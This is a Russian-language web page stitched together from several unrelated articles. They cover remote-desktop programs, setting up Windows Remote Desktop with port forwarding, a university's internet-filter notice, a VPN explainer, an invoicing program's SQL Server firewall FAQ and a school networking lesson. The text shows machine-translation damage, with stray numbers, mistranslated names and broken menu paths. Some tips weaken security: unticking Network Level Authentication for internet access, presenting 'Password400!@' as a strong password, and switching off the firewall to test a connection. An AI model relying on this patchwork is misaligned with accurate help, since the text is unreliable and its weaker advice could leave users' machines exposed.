Зато клиентом может быть Mac и даже мобильные устройства. Кроме того, подключённый пользователь может копировать файлы с удалённого компьютера через общий буфер обмена.

Чтобы использовать «Удалённый рабочий стол», нужно правильно настроить сервер. Это займёт у вас некоторое время. Но если не хотите разбираться в IP‑адресах и сетевых портах, можете использовать другие программы из этой статьи. Они гораздо проще.

Инструкция для сервера

  1. Включите функцию «Удалённый рабочий стол». В Windows 10 это можно сделать в разделе «Параметры» → «Система» → «Удалённый рабочий стол». В старых версиях ОС эта настройка может находиться в другом месте.
  2. Узнайте свои локальный и публичный IP‑адреса, к примеру с помощью сервиса 2IP. Если устройством‑клиентом управляет другой человек, сообщите ему публичный IP, а также логин и пароль от своей учётной записи Windows.
  3. Настройте на роутере перенаправление портов (проброс портов или port forwarding). Эта функция открывает доступ к вашему компьютеру для других устройств через интернет. Процесс настройки на разных роутерах отличается, инструкцию для своей модели вы можете найти на сайте производителя.

В общих чертах действия сводятся к следующему. Вы заходите в специальный раздел настроек роутера и создаёте виртуальный сервер, прописывая в его параметрах локальный IP‑адрес и порт 3389.

Открытие доступа к компьютеру через перенаправление портов создаёт новые лазейки для сетевых атак. Если боитесь вмешательства злоумышленников, ещё раз подумайте, стоит ли использовать именно этот способ.

Инструкция для клиента

  1. Наберите в поиске по системе «Подключение к удалённому рабочему столу» и запустите найденную утилиту. Или нажмите клавиши Win+R, введите команду mstsc и нажмите Enter.
  2. В открывшемся окне введите публичный IP‑адрес компьютера, который выступает сервером. Затем укажите логин и пароль от его учётной записи Windows.

После этого вы получите полный контроль над рабочим столом удалённого компьютера.

3. Общий экран (Screen Sharing)

  • К каким платформам можно подключаться: macOS.
  • С каких платформ возможно подключение: macOS.

Пожалуй, простейший способ установить удалённое подключение между двумя компьютерами Mac — сделать это с помощью стандартного macOS‑приложения «Общий экран». Сторонние утилиты для этого вам не понадобятся.

Чтобы подключиться к удалённому компьютеру, нужно найти в поиске Spotlight «Общий экран» и запустить эту программу. В появившемся окошке следует набрать Apple ID удалённого компьютера или имя его пользователя, если оно есть в списке контактов на текущем Mac. После этого остаётся только отправить запрос на подключение.

Получив запрос, пользователь на стороне сервера может разрешить полное управление своим компьютером и его содержимым или только пассивное наблюдение.

4. Удалённый рабочий стол Chrome (Chrome Remote Desktop)

  • К каким платформам можно подключаться: Windows, macOS, Linux.
  • С каких платформ возможно подключение: Windows, macOS, Linux, Android, iOS.

«Удалённый рабочий стол Chrome» — очень простая кросс‑платформенная программа для организации удалённого доступа. Её десктопная версия представляет собой приложение для Google Chrome, которое позволяет управлять всей системой без лишних настроек.

В десктопной версии «Удалённый рабочий стол Chrome» отображаются два раздела меню: «Удалённый доступ» и «Удалённая поддержка». В первом необходимо задать имя и пароль для подключения к компьютеру. Во втором можно сгенерировать код для соединения (сервер), также ввести код (клиент) для подключения к удалённому ПК.

Мобильное приложение «Удалённый рабочий стол Chrome» предоставляет удалённый доступ к компьютеру. При этом подключаться в обратную сторону — с компьютера к мобильному устройству — нельзя. В то же время десктопная версия может сделать компьютер как клиентом, так и сервером.

5. TeamViewer

  • К каким платформам можно подключаться: Windows, macOS, Linux, Android, iOS.
  • С каких платформ возможно подключение: Windows, macOS, Linux, Android, iOS.

TeamViewer можно назвать одной из самых известных программ для создания удалённых подключений. Своей популярностью она обязана поддержке множества платформ, простоте использования и количеству функций. Среди прочего программа позволяет записывать сеансы на видео, общаться участникам в голосовом и текстовом чатах и открывать удалённый доступ только к выбранным приложениям.

Чтобы подключить два устройства, нужно сгенерировать на сервере ID и пароль и ввести их на стороне клиента. У TeamViewer очень дружелюбный интерфейс с обилием подсказок, поэтому освоить её очень легко.

Вы можете установить полноценную версию программы либо использовать её портативный вариант QuickSupport. Последний не нуждается в установке, но поддерживает не все возможности TeamViewer. Кроме того, список доступных функций программы меняется в зависимости от используемых платформ.

Приложение не найдено

Загрузить TeamViewer или QuickSupport для Windows, Linux и macOS →

Приложение не найдено

6. Real VNC

  • К каким платформам можно подключаться: Windows, macOS, Linux, Raspberry Pi.
  • С каких платформ возможно подключение: Windows, macOS, Linux, Raspberry Pi, Chrome, Android, iOS.

Ещё одна популярная программа, которая доступна на всех ключевых платформах и отличается высокой стабильностью работы. Как и другие мощные инструменты, Real VNC распространяется на платной основе. Однако для домашнего персонального использования приложение полностью бесплатно — ограничением является лимит на пять компьютеров и трёх пользователей.

Real VNC работает очень просто. На компьютер нужно установить серверную часть, задать пароль и другие несложные параметры с помощью пошагового мастера настройки. После этого через приложение‑клиент на ПК или мобильном устройстве можно подключиться к серверу для просмотра рабочего стола и управления им. Передача файлов работает только между компьютерами, но в бесплатной версии эта функция недоступна.

Real VNC →

Приложение не найдено

7. AnyDesk

  • К каким платформам можно подключаться: Windows, macOS, Linux, Raspberry Pi, Android.
  • С каких платформ возможно подключение: Windows, macOS, Linux, Android, iOS, Chrome.

Мощный инструмент для удалённой работы, который охватывает все возможные задачи и полностью бесплатен при условии некоммерческого использования. Серверная часть AnyDesk имеет портативную версию и способна работать даже без установки.

Помимо кроссплатформенности, к преимуществам программы можно отнести простоту подключения — нужно лишь ввести одноразовый код на клиентском устройстве и подтвердить соединение на сервере. AnyDesk поддерживает запись удалённых сессий, а также имеет аудиочат и функцию передачи файлов.

AnyDesk →

8. Remote Utilities

  • К каким платформам можно подключаться: Windows.
  • С каких платформ возможно подключение: Windows, macOS, Linux, Android, iOS.

Удобный инструмент для удалённого подключения к компьютерам, который можно использовать для оказания помощи друзьям или просто доступа к своей домашней машине через интернет. Серверная часть Remote Utilities устанавливается только на Windows, зато клиенты доступны на всех популярных платформах.

Процесс подключения довольно прост. Помимо просмотра рабочего стола и управления компьютером, в Remote Utilities есть такие полезные функции, как передача файлов, запись сессий и видеочат. Бесплатная лицензия допускает использование до 10 компьютеров, в остальном всё работает без ограничений.

Remote Utilities →

9. Ammyy Admin

  • К каким платформам можно подключаться: Windows.
  • С каких платформ возможно подключение: Windows.

Одна из самых простых программ, которая позволит подключиться к компьютеру другого человека через интернет для просмотра рабочего стола и администрирования. Работает без установки и перенастройки роутера.

Несмотря на аскетичный интерфейс, предлагает массу полезных возможностей, среди которых передача файлов и папок, а также голосовой чат для общения. Ammyy Admin позволяет удалённо перезагружать компьютер, входить в систему и менять пользователей. После первичной настройки приложение даже не требует присутствия человека у компьютера‑сервера.

Ammyy Admin →

10. AeroAdmin

  • К каким платформам можно подключаться: Windows.
  • С каких платформ возможно подключение: Windows.

Ещё одна простая утилита для удалённого подключения к Windows. AeroAdmin работает без регистрации, не требует установки и предварительных настроек. Для использования в личных целях бесплатна с лимитом до 17 часов работы в месяц.

Просто запустите AeroAdmin на одном компьютере, а затем на втором введите ID и PIN‑код. После подтверждения запроса на подключение можно управлять сервером и делиться файлами и другим контентом с помощью буфера обмена.

AeroAdmin →

Материал был обновлён 18 января 2020 года

Читайте также 🧐

Как удаленно управлять другими компьютерами в локальной сети/Wi-Fi

Хотите получить удаленный доступ к другому компьютеру в вашей локальной сети или Wi-Fi? Для этого не нужно устанавливать TeamViewer и AnyDesk — в Windows есть встроенная функция удаленного рабочего стола, позволяющая удаленно управлять рабочим столом.

Традиционно для таких целей используются такие программы, как TeamViewer или AnyDesk.Это очень хорошее и проверенное программное обеспечение, которое при установке на оба устройства (например, на домашние и домашние компьютеры) позволяет удаленно управлять своим компьютером из совершенно другого места. Однако в основном это полезно, когда второй компьютер находится в удаленном месте и нам нужно установить соединение через Интернет. В том случае, если оба компьютера находятся в одной сети, нам не нужно устанавливать отдельное программное обеспечение — только то, что предлагает Windows.

Удаленное управление вторыми компьютерами

Чтобы использовать эту функцию, необходимо сначала настроить компьютер, к которому вы хотите получить удаленный доступ.Предположим, у нас есть ситуация, когда мы хотим получить доступ к частному компьютеру с офисного компьютера. В этом случае мы должны включить удаленное управление устройством на частном компьютере.

Для этого на частном компьютере откройте меню «Пуск» и введите слово «удаленный». Вы должны найти опцию с полным названием «Разрешить удаленный доступ к моему компьютеру». Мы включаем его.

Отобразится новое окно.На вкладке «Удаленный рабочий стол» мы должны выбрать опцию «Разрешить удаленные подключения к этому компьютеру». Подтвердите изменения кнопкой ОК. Наш персональный компьютер готов - он был должным образом подготовлен для приема удаленных подключений. Теперь нам нужно подключиться к нему с помощью корпоративного компьютера.

Убедимся, конечно, что оба компьютера находятся в одной локальной или беспроводной сети. Затем мы открываем меню «Пуск» на компьютере компании и ищем опцию «Подключение к удаленному рабочему столу».Появится окно подключения ко второму компьютеру в нашей локальной сети. В поле «Компьютер» мы должны ввести имя компьютера, к которому мы хотим подключиться.

В данном случае вводим имя домашнего компьютера (у меня это будет "Download-PC"). Если вы не знаете, как называется ваш компьютер, вы можете легко его проверить. Просто запустите окно проводника и щелкните правой кнопкой мыши поле «Этот компьютер», затем выберите «Свойства». Отобразятся сведения о системе с именем компьютера в списке информации.

После ввода имени компьютера нажмите кнопку «Подключиться». Система запросит авторизацию — мы не можем просто подключиться к любому компьютеру. Нам еще нужно авторизоваться в нем.

Все, что нам нужно сделать, это ввести логин и пароль к учетной записи пользователя, с которой мы заходим в систему. Если мы подключаемся к Windows 8 / 8.1 или 10, на которой настроена учетная запись Microsoft, мы предоставляем адрес электронной почты и пароль для учетной записи Microsoft.

После подтверждения сертификата и принятия данных для входа система установит соединение и отобразит содержимое другого нашего компьютера.Мы можем получить полный контроль над ним, запускать программы, ремонтировать, выполнять удаленные операции и т. д.

По умолчанию удаленный рабочий стол отображается в полноэкранном режиме, но мы можем в любой момент переключиться в оконный режим, чтобы сделать что-то в локальной системе — просто используйте верхнее меню, которое позволяет уменьшить рабочее пространство или свернуть удаленный рабочий стол. .

.

Remote Desktop — пошаговая инструкция по установке

В предыдущем посте про удаленный рабочий стол я попытался показать его преимущества в малом и среднем бизнесе - как инструмент, который экономит время и дает возможность подключиться к компьютеру в любой момент.

Сегодня я предоставлю вам пошаговые инструкции о том, как установить удаленный рабочий стол на ваши компьютеры.

Для подключения к удаленному компьютеру ничего устанавливать не нужно — достаточно воспользоваться средствами, доступными в Windows.

1. Щелкните правой кнопкой мыши значок Компьютер на рабочем столе, выберите W Свойства . В окне System выберите Advanced System Settings.

2. Выберите вкладку Remote .

Выберите вкладку «Удаленное»

3. Выберите параметр Разрешить удаленные подключения с этого компьютера .

Дополнительный параметр — «Разрешить подключения только с компьютеров, на которых запущен удаленный рабочий стол с проверкой подлинности на уровне сети» ограничит функциональность службы только локальной сетью, поэтому, если вы планируете подключения RDP из-за пределов локальной сети — снимите этот флажок.

4. После активации удаленных подключений требуется - если у вас его еще нет - создайте пароль в своей учетной записи пользователя.

Перейдите в Панель управления -> Учетные записи пользователей . Выберите свою учетную запись пользователя и щелкните ссылку , чтобы создать или изменить пароль пользователя.

Создайте надежный пароль по популярной схеме - он должен содержать буквы верхнего и нижнего регистра, специальные символы и/или цифры, например Password400!@.

Помните, что этот пароль является вашей единственной защитой при RDP-подключении, держите его надежным.

4. Я упомянул о подключении к удаленному рабочему столу через Интернет. Если вы намерены работать таким образом, вам может потребоваться создать соответствующее правило брандмауэра в вашем антивирусе или настроить порт на корпоративном маршрутизаторе.

Для работы службы требуется порт TCP 3389.

Войдите в панель управления с помощью маршрутизатора и найдите параметр для настройки переадресации портов. Вам необходимо создать запись, которая будет перенаправлять входящий трафик на порт 3389 на определенный компьютер в сети, например.с адресом 192.168.1.101 как в примере:

Если вы не уверены в необходимости настройки роутера - обратитесь к вашему интернет провайдеру

Обратите внимание, что эта конфигурация не является обязательной и может вам не потребоваться. Если вы не уверены, обратитесь к своему интернет-провайдеру, чтобы узнать, требуется ли это.

5. Когда все будет готово - можем подключить .

Нам не нужно ничего устанавливать для использования служб удаленных рабочих столов.Все необходимое можно найти в системе.

Посмотрите Пуск -> Все программы -> Стандартные и выберите "Подключение к удаленному рабочему столу"

В Windows 8 нажмите клавишу и начните вводить «подключение», система автоматически найдет для вас необходимое приложение.

Windows поможет подобрать подходящий вариант.

6. В новом окне вводим:

  • локальный IP-адрес, например.192.168.1.101 90 103
  • локальное имя компьютера (Netbios), например Komputer12, Janusz-Laptop
  • внешний (WAN) IP-адрес
  • адрес домена
  • , если настроен, например, remote.yourcompany.pl

7. Нажмите "подключиться".

8. Вам будет предложено войти в учетную запись пользователя на целевом компьютере:

9. Нажмите OK. Через несколько секунд появится наш удаленный рабочий стол и мы сможем работать так, как если бы мы были на сайте .Так же вводим пароль и... готово!

Теперь мы можем свободно работать из дома.

Я надеюсь, что это краткое руководство было полезным для вас — если у вас есть какие-либо вопросы — не стесняйтесь писать в комментариях.

___

Статья создана благодаря CORE - польскому дистрибьютору антивирусов AVAST и AVG. Проверьте антивирус AVAST и присоединяйтесь к людям, которые наслаждаются безопасностью своего компьютера.

Оценить предмет

[Голосов: 10 Среднее: 3.6]

Вам понравилась эта статья?

Подпишитесь на рассылку и не пропустите новые раритеты, советы и конкурсы!

У вас малый или средний бизнес?

Скачать бесплатную электронную книгу - Надежная компания с AVG , которая поможет вам повысить безопасность бизнеса, сэкономить время и деньги.

В нем вы найдете более 30 конкретных статей, благодаря которым вы научитесь быстро и легко заботиться о таких вещах, как безопасная политика паролей, резервное копирование ценных данных, блокировка портов USB, использование удаленного рабочего стола, аварийное восстановление данных с помощью бесплатные инструменты... и многое другое!

Получите электронную книгу прямо сейчас!

.

Конфигурация удаленного рабочего стола

Дамиан Стельмах

Remote Pulpit — это служба , доступная в системах , как на сервере , так и на клиенте , то есть в Windows 7, 8.1 и 10. Эта служба позволяет удаленно подключаться к Windows . запуск с другого компьютера в сети .Это удобное решение для администраторов, которые могут подключиться к серверу, работая в данный момент в другой комнате офиса, за другим компьютером. Для тех, кто использует Team Viewer , добавлю, что Remote Desktop — аналогичный сервис, чуть менее обширный. По умолчанию эта служба отключена, поэтому, если мы хотим подключиться к серверу удаленно, мы должны ее запустить.

Windows Server 2008 R2

  • Start -> ч / млн до Компьютер -> Свойства
  • Advanced System. option Разрешить подключение только с компьютеров, на которых запущен удаленный рабочий стол с проверкой подлинности на уровне сети

По умолчанию только пользователи с правами администратора могут подключаться к серверу через Remote Desktop .Если мы хотим разрешить подключение к серверу для пользователя, не являющегося администратором, мы можем добавить его в список, нажав Select users -> Add .

Windows Server 2012 R2

  • Значок папки (рядом с запуском)
  • ч / млн до Этот компьютер (левая сторона экрана) -> Свойства
  • . экрана)
  • Вкладка Удаленный
  • Установите флажок Разрешить подключение только с компьютеров, на которых запущен удаленный рабочий стол с аутентификацией на уровне сети
.

LubMAN UMCS: система управления доступом в Интернет - Системы - Для сотрудников - LubMAN UMCS

Система управления доступом в Интернет используется для повышения безопасности административной сети UMCS .

Система выполняет следующие функции:

  • защита административной сети UMCS от вирусов и спама ,
  • защита компьютеров административной сети UMCS от нежелательного доступа из сети Интернет,
  • протоколирование соединений между компьютерами в UMCS административная сеть и ресурсы сети Интернет,
  • Фильтрация доступа в Интернет.

Доступ к интернет-ресурсам с компьютеров административной сети UMCS (из так называемой защищенной сети ) будет возможен после авторизации в системе с использованием личного кабинета пользователя. Учетная запись должна быть создана при первой попытке подключения к интернет-ресурсам. Пользователь самостоятельно настраивает личный кабинет в системе, заполнив форму на главной странице. Создание учетной записи в системе является разовой операцией. Каждый раз, когда вы подключаетесь к Интернету, вам нужно только войти в систему с домашней страницы.После запуска компьютера при первой попытке подключения к Интернету первой появится страница входа в систему. Только правильный вход в систему дает вам право пользоваться Интернетом.

Система управления доступом в Интернет не охватывает академическую часть сети Университета.

Соответствующая информация:

  1. Система не сохраняет и не архивирует данные, отправленные пользователями в рамках доступа в Интернет.
  2. Доступ к внутренним ИТ-ресурсам Университета, т.е. сайту Университета, электронной почте на серверах Университета, доступ к системе SAP и т.п., не требует авторизации в Системе.
  3. Интернет-соединения регистрируются, и доступ к некоторым страницам будет ограничен.

Система доступна по адресу: http://filtr.umcs.lublin.pl

Контактное лицо:

пл. Marii Curie-Skłodowskiej 4 / 09B
тел.: 81 537 26 04
оператор @ mail.umcs.pl

.

Как работает VPN с удаленным доступом? »Помощь

Если ваша команда не может постоянно работать в офисе, создайте условия для ее удаленной работы. Независимо от того, путешествуют ли они по делам или работают из дома, вы можете использовать лучшие инструменты, чтобы обеспечить им безопасный доступ к данным вашей компании. VPN удаленного доступа — это механизм, основанный на сетевом соединении и создании виртуального туннеля. Соединение осуществляется между устройством сотрудника и сетью компании. Туннель проходит через общедоступный Интернет, но данные, которые перемещаются внутри него в обоих направлениях, защищены протоколами шифрования и безопасности.Таким образом, сохраняется конфиденциальность и безопасность.

СОДЕРЖАНИЕ

Вы работаете в режиме домашнего офиса? Мы подготовили для вас набор идей по организации удаленной работы и инструментов, которые сделают ее безстрессовой и эффективной. Проверить: Okaz.home.pl/homeoffice/

VPN — защита конфиденциальности и шифрование данных

Службы

VPN часто являются рекомендуемым способом повышения безопасности работы в Интернете, обеспечивая лучшую защиту конфиденциальности.Это делается путем подключения к выделенным серверам, которые защищают нас в Интернете с помощью дополнительных функций, например, изменение местоположения, IP-адреса, сетевое шифрование, отсутствие входа в систему.

Интернет-пользователи

часто используют VPN для повышения производительности, получения доступа к новому контенту или просто для защиты своей конфиденциальности.

Узнайте больше о VPN:

VPN при удаленной работе

Служба VPN для удаленной работы позволяет удаленным работникам устанавливать безопасные онлайн-соединения с компьютерной сетью компании.Из любой точки мира. Основная роль VPN в поддержке удаленной работы заключается в обеспечении безопасности связи между пользователем и корпоративной компьютерной сетью. Многие компании используют VPN при создании корпоративной сети. Таким образом, они могут быть уверены, что никто извне, кто не авторизован, не получит доступ к определенным ресурсам, например, системам управления клиентами.

Тот же механизм используется для поддержки удаленной работы. Используя приложение VPN-подключения, сотрудник может подключиться к корпоративной сети.Для этого могут потребоваться дополнительные ключи, назначенные, например, службой поддержки. Именно благодаря им сотрудник, пытающийся выйти в сеть, сможет это сделать. На практике это означает, что даже использование VPN посторонними лицами не дает им возможности получить доступ к сети компании, не имея при себе ключей безопасности для этой сети.

Один из инструментов VPN с самым высоким рейтингом надежности и конфиденциальности — AVG Secure VPN . Вы найдете эту услугу в предложении нашей компании.AVG Secure VPN — платная услуга, позволяющая защитить подключения до 5 устройств одновременно по одной лицензии. Программное обеспечение дает вам доступ к огромному количеству надежных VPN-серверов, которые предлагают множество типов соединений.

Таким образом, компании используют VPN удаленного доступа для создания безопасного соединения между удаленными рабочими устройствами сотрудников и их внутренней сетью. После подключения сотрудники могут получить доступ к ресурсам в сети, как если бы их устройства были физически подключены в офисе.Это решение основано на двух элементах: сервере доступа к сети и программном обеспечении VPN-клиента (установленном на устройстве сотрудника).

Защита данных компании

Самым важным преимуществом использования VPN-подключения в отношениях между сетью компании и устройством сотрудника является, конечно же, безопасность данных. Передаваемые данные шифруются, а само соединение защищено. Это снижает риск перехвата данных и их использования посторонними лицами. Это имеет большое значение, особенно во время путешествий и, например.использование общедоступных сетей Wi-Fi. Но это также и защита сети компании в офисе. Защита информации, которая не должна выходить за пределы территории компании. VPN с удаленным доступом недороги и безопасны, и компании, использующие их, могут предлагать удаленную работу своим сотрудникам. Сотрудники, которые могут работать, когда и где хотят, также более счастливы и продуктивны.

См. дополнительную информацию:

  • Была ли эта статья полезной?
  • Да Нет

.

Может ли приложение работать на нескольких компьютерах? • Программа выставления счетов Elisoft

Да, приложение позволяет работать параллельно на нескольких компьютерах в сети. Это позволяет иметь доступ к одни и те же данные с множества разных компьютеров, если они подключены к локальной сети или имеют доступ к Интернету.

Когда компьютеры находятся в одной локальной сети (например, несколько компьютеров на работе или дома), конфигурация программы обычно очень просто - вам нужно только ввести имя компьютера, на котором расположен сервер базы данных, чтобы сделать программа смогла подключиться к нему.

После первой установки приложения из полного установщика на компьютер устанавливается как сервер баз данных Microsoft SQL Server, а также само приложение Invoice 2022 или Firma 2022. Приложение настроено по умолчанию так, чтобы подключиться к серверу на локальном компьютере (тот же, на котором он установлен). Использовать приложение на другом компьютере в сети, на нем должно быть установлено только приложение Счет 2022 или Фирма 2022 небольшой установщик приложения, который установит только само приложение для выставления счетов (больше не сервер базы данных), а затем в конфигурации следует указать, где находится сервер базы данных, к которому должно подключаться приложение.

На картинке выше вы можете увидеть схему сети с 3 компьютерами. Один из них (S) выступает в роли сервера - установлен на нем сервер базы данных Microsoft SQL Server (на практике он обычно также будет установлен на этом компьютере Клиентское приложение Faktura 2022 или Firma 2022), на остальные компьютеры (A, B, C) устанавливался только сам компьютер клиентское приложение (Счета-фактуры 2022 или Фирма 2022).Чтобы использовать приложение на этих компьютерах, оно должно необходимо настроить подключение к S-серверу, с которого приложение будет получать данные - это показано стрелками.

Для этого сначала прочитайте имя компьютера, на котором установлен сервер базы данных Microsoft. SQL-сервер. Имя компьютера можно легко найти в свойствах компьютера (правый клик по иконке Компьютер или Мой компьютер, выберите Свойства и найдите имя компьютера.)Затем на остальных компьютерах в сети (в приведенном выше примере это будут компьютеры А, В, С) запустить клиентское приложение Фактуры 2022 или Фирма 2022 и в окне входа нажмите кнопку Конфигурация.

Появится окно для настройки подключения к серверу, как показано ниже. В поле Сервер-Компьютер (в котором по умолчанию введено слово local), введите имя сервера-компьютера, прочитанное в предыдущем шаге (в нашем примере на рисунке это S).Убедитесь, что введенное имя не содержит скобок и кавычек. Остальные параметры оставьте без изменений.

Используя команды Test Server Connection и Test Database Connection, проверяем правильно ли компьютер подключается к серверу и БД на сервере. Если соединение установлено, просто нажмите кнопку ОК и войдите в приложение.

Конфигурация правильная, но проверка соединения с сервером не проходит - в чем может быть причина?

Если соединение с сервером не установлено, и мы уверены, что имя сервера-компьютера введено правильно и компьютеры они "видят" друг друга (т.е. находятся в одной сети), наиболее распространенной причиной может быть брандмауэр (или антивирус) на сервере или клиенте, который блокирует соединения с сервером.Вы можете проверить это временно отключите брандмауэр/антивирус на сервере и клиенте и выполните тест соединения. Если тест прошел успешно, мы имеем подтверждение того, что блокировка связана с брандмауэром/антивирусом. При этом брандмауэр/антивирус должны быть включены, но обязательно создать исключение в брандмауэре/антивирусе, чтобы разрешить связь между сервером и клиентом (в корпоративных сетях лучше всего обратиться к сетевому администратору, который установит соответствующие правила в брандмауэре).

1. Настройте брандмауэр Windows

.

В случае брандмауэра Windows необходимо разблокировать порт 1433 TCP и 1434 UDP, создание двух правил для этих портов. Для этого на сервере в Панель управления / Система и безопасность / Брандмауэр Windows щелкните Дополнительные параметры. Затем выберите Входящие правила и щелкните действие «Новое правило».

На вкладке Тип правила выберите Порт.

На вкладке «Протокол и порты» выберите TCP и введите порт 1433.

На вкладке Имя введите имя правила, напримерSQL SERVER 1433 TCP и нажмите Готово.

Щелкните действие «Новое правило» еще раз и добавьте новое правило для UDP-порта 1434.

Назовите это правило, например, SQL SERVER 1434 UDP, и нажмите «Готово».

2.Включить службу обозревателя SQL Server

.

Проверьте, включена ли служба обозревателя SQL Server. Для этого зайдите в окно системных служб - откройте меню Пуск | в Windows Запустить его (или нажмите Win + R) и введите services.msc в поле запуска и нажмите ОК.

В списке служб найдите службу обозревателя SQL Server и проверьте, запущена ли она — если остановлена, запустите ее.

3. Включить протокол TCP/IP

В установленных программах из меню «Пуск» найдите и запустите Диспетчер конфигурации SQL Server. Вы также можете найти программу, введя ее имя в меню «Пуск».

В окне менеджера разверните Сетевую конфигурацию SQL Server. выберите Протоколы для ELISOFT и в панели справа убедитесь, что протокол TCP/IP находится в статусе Включено.Если нет, щелкните правой кнопкой мыши протокола и выберите «Включить» во всплывающем меню.

Введите порт 1433 в свойствах TCP/IP в разделе IP ALL, как показано на экране ниже.

4.Убедитесь, что серверный компьютер и клиентские компьютеры находятся в одной сети (рабочей группе)

.
Может ли сервер базы данных находиться в Интернете?

Непременно - использование сервера базы данных, размещенного в Интернете, дает вам возможность использовать его из программы из любого места с многих компьютеров одновременно и, что немаловажно, программы могут находиться в разных сетях. Таким образом, вы можете использовать программу на своем ноутбуке, находясь в дороге, и в то же время ее может использовать другой пользователь. программа в офисе.

Программа настраивается так же, как и для работы в локальной сети, с той разницей, что вместо ввода имени сервера-компьютера из локальной сети введите имя серверного компьютера, расшаренного в Интернете. Вы также должны ввести другое имя пользователя и пароль в соответствии с настройками поставщика сервера.

Есть два интересных варианта использования сервера баз данных в Интернете

  • Использование SQL-сервера от интернет-провайдера, предоставляющего услуги хостинга баз данных на Microsoft SQL Server (например,WEBIO.PL)
  • с использованием VPS (Virtual Private Server) с Windows (виртуальная машина) и установкой на нем SQL-сервера (вариант, аналогичный приведенному выше, но дающий гораздо больший контроль над сервером базы данных). Эту услугу предлагают многие хостинг-провайдеры.

Если вы используете SQL-сервер из Интернета, вам следует проверить, достаточно ли быстры серверы провайдера.

.90 000 компьютерных сетей. Подключение компьютеров к сети. Класс 2

Заказать Издательство МиГра (издательский магазин)

2 класс. Рекомендуемое время: 2 урока

Почему компьютеры подключены к сети?

Целью подключения компьютеров к компьютерной сети является обмен данными и снижение затрат на организацию работ. На снижение затрат на организацию труда влияет, в том числе, получение доступа к большим дисковым пространствам, программам и внешним устройствам.Например, один принтер может обслуживать несколько пользователей в подключенной сети.

Общие сетевые ресурсы — это все виды данных и устройств, к которым мы обращаемся в сети.

Преимущества сетевых компьютеров

  • Быстрый и прямой обмен данными
  • совместное использование аппаратных ресурсов
  • Центральное хранилище программ и данных
  • Автоматизация резервного копирования важных файлов
  • удаленный доступ из любой точки мира
  • простое расширение структуры, например предприятия

Сетевая операционная система управляет работой компьютеров в сети.В настоящее время популярными сетевыми системами являются Linux, Windows Server, Unix

.

Раздел компьютерной сети

Разделение сетей по их размеру
  • Локальные вычислительные сети (ЛВС) - включают компьютеры, соединенные на ограниченной территории (в одном здании или нескольких зданиях)
  • Городские сети (MAN) - подключение локальных сетей в одном городе
  • Глобальные сети (WAN) — соединение выбранных локальных сетей на большей территории
  • Интернет - соединяет практически все сети мира

Разделение сети по операционной модели

Одноранговая сеть чаще всего используется дома и на малых предприятиях.В сети такого типа работает до десятка компьютеров. Каждый компьютер в организации данного типа сети имеет одинаковые права, и является одновременно сервером

и клиентом
(источник Информатика для общеобразовательных школ, 2 класс, издание МиГра)

Сеть клиент-сервер


(источник Информатика для общеобразовательных школ, 2 класс, издание МиГра)

В сети «клиент-сервер» хотя бы один компьютер выступает в роли сервера, что делает его ресурсы доступными для нескольких клиентов

Разделение сетей по топологии - пространственное расположение

  • звездообразная топология - компьютеры соединены между собой одной центральной точкой
  • шина (bus) топология - компьютеры подключены к общему проводу
  • Топология кольца
  • — аналогична топологии шины, но концы провода соединены вместе, образуя кольцо
  • .

В звездообразной топологии отдельные компьютеры подключаются к одному центральному коммутатору.Каждый клиент (рабочий компьютер) подключается к центральному устройству (коммутатору) отдельным кабелем. Повреждение кабеля не приводит к выходу из строя всей сети. Также нет проблем с передачей данных от нескольких клиентов одновременно.

Единицей скорости передачи данных в компьютерных сетях и цифровой телекоммуникации является число мегабит в секунду ( Мбит/с )

Основы настройки сети

Условием подключения компьютера к сети является наличие сетевой карты, настройка сетевого протокола, программного обеспечения сетевого клиента и программного обеспечения, выполняющего сетевые службы, которые будет использовать устройство.

Сетевая карта — это плата расширения, которая позволяет одному компьютеру подключаться к другим компьютерам. В большинстве современных компьютеров эта плата встроена в материнскую плату.

Сетевой протокол создает набор правил, определяющих связь и контролирующих правильность передачи данных

Сетевой клиент — это программное обеспечение, установленное на рабочем компьютере, позволяющее использовать сетевые ресурсы

Служба определяет функцию, выполняемую компьютером, работающим в сети (общий доступ к папкам, файлам, принтерам)

Для Windows 7.8 и 8.1 w Панель управления/Центр управления сетями и общим доступом может управлять доступом компьютера к сети

Пример открытого окна приложения, управляющего конфигурацией доступа компьютера к сети

Сетевые протоколы

Одним из наиболее широко используемых сетевых протоколов является TCP/IP . Каждый компьютер, работающий в сети, должен иметь адрес IP независимо от того, подключен ли он к глобальной сети, например Интернету, или к локальной сети.

IP-адрес назначается сетевым администратором или автоматически назначается DHCP-сервером (DHCP-сервер часто входит в состав маршрутизаторов, используемых в домашних сетях). Компьютеры, работающие в одной сети, не могут иметь одинаковые IP-адреса.

В настоящее время форма IP-адреса записывается в формате 32-битного числа. Для человека этот адрес представлен в виде четырех октетов, разделенных точками

. 192.168.8 -1)

Для данного компьютерного блока, подключенного к сети, конфигурация IP-протокола может быть быстро прочитана после запуска командного интерпретатора cmd.exe (Windows 7, 8 и 8.1 введите cmd в командной строке).

После запуска приложения cmd.exe в командной строке введите команду ipconfig /all

Идентификатор сети

Для облегчения администрирования или идентификации компьютеров в локальной сети присваивается имя , а группа присваивается группе компьютеров.Например, в Windows 7 это можно сделать, выбрав Панель управления/Система/Изменить настройки

Образец сетевой структуры

Домашняя компьютерная сеть


(источник Информатика для общеобразовательных школ, 2 класс, издание МиГра)

Школьная компьютерная сеть


(источник Информатика для общеобразовательных школ, 2 класс, издание МиГра)

Основы сети

Логин

Вход в систему — это процесс ввода идентификатора пользователя и пароля при запуске сети.Начальный идентификатор и пароль предоставляются лицом, которое управляет сетью

.

Предоставление ресурсов

Функциональность сети расширена за счет разрешения доступа к ресурсам с других компьютеров. Например, в Windows 7 после выбора значка диска или папки из меню правой кнопки мыши выберите функцию Поделиться

Условия совместного доступа можно указать в опции Расширенный общий доступ

Сопоставление ресурсов

Сопоставление ресурсов — это сопоставление обозначения диска локального компьютера с выбранным ресурсом на удаленном компьютере.Картирование облегчает (ускоряет) доступ к ресурсу.

.

Смотрите также

Только новые статьи

Введите свой e-mail

Видео-курс

Blender для новичков

Ваше имя:Ваш E-Mail: